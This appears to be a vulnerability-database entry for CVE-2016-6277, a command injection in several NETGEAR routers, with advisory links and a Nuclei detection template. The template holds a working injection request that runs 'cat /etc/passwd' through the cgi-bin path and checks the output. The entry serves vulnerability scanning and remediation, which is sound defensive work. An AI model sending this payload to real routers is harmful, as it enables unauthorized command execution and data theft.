NETGEAR Routers - Remote Code Execution

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType

NETGEAR Routers - Remote Code Execution CVE-2016-6277. Vulnerable routers: R6250, R6400, R6700, R7000, R7100LG, R7300DST, R7900, R8000, D6220, D6400, D7000

Reporter	Title	Published	Views	Family All 35
0day.today	Netgear R7000 / R6400 cgi-bin Command Injection Exploit	12 Mar 201700:00	–	zdt
0day.today	Netgear R6400 - Remote Code Execution Exploit	17 Dec 201900:00	–	zdt
ATTACKERKB	CVE-2016-6277	14 Dec 201600:00	–	attackerkb
BDU FSTEC	The vulnerability of the embedded software of NETGEAR routers such as R6250, R6400, R6700, R6900, R7000, R7100LG, R7300DST, R7900, R8000, D6220, D6400, and D7000 lies in the insufficient verification of the authenticity of executed requests. This allows attackers to execute arbitrary commands.	6 Mar 202300:00	–	bdu_fstec
Circl	CVE-2016-582384	12 Dec 201616:48	–	circl
Circl	CVE-2016-6277	7 Dec 201600:00	–	circl
CISA KEV Catalog	NETGEAR Multiple Routers Remote Code Execution Vulnerability	7 Mar 202200:00	–	cisa_kev
CISA	CISA Adds 11 Known Exploited Vulnerabilities to Catalog	7 Mar 202200:00	–	cisa
CNVD	Arbitrary Command Injection Vulnerability in a Variety of Netgear Netgear Routers	9 Dec 201600:00	–	cnvd
Check Point Advisories	Netgear R7000 and R6400 cgi-bin Command Injection (CVE-2016-6277)	23 May 201700:00	–	checkpoint_advisories

Source	Link
sj-vs	www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
nvd	www.nvd.nist.gov/vuln/detail/CVE-2016-6277
sj-vs	www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
kb	www.kb.cert.org/vuls/id/582384
kb	www.kb.netgear.com/000036386/CVE-2016-582384

id: CVE-2016-6277

info:
  name: NETGEAR Routers - Remote Code Execution
  author: pikpikcu
  severity: high
  description: NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected router, potentially leading to unauthorized access, data theft, or network compromise.
  remediation: |
    Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.
  reference:
    - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
    - https://nvd.nist.gov/vuln/detail/CVE-2016-6277
    - http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
    - https://www.kb.cert.org/vuls/id/582384
    - http://kb.netgear.com/000036386/CVE-2016-582384
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2016-6277
    cwe-id: CWE-352
    epss-score: 0.99781
    epss-percentile: 0.99955
    cpe: cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: netgear
    product: d6220_firmware
  tags: cve2016,cve,netgear,rce,iot,kev,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100fe6f5b95c51a07d57f552f009353d2dbc7178f2668d51ed65dc8fdb51209c6e30220294449c1af120743a727f725d81415fe60016097e55660d3c87d520b08ae1093:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

8.5High risk

Vulners AI Score8.5

CVSS 3.18.8

CVSS 29.3

EPSS0.99781

SSVC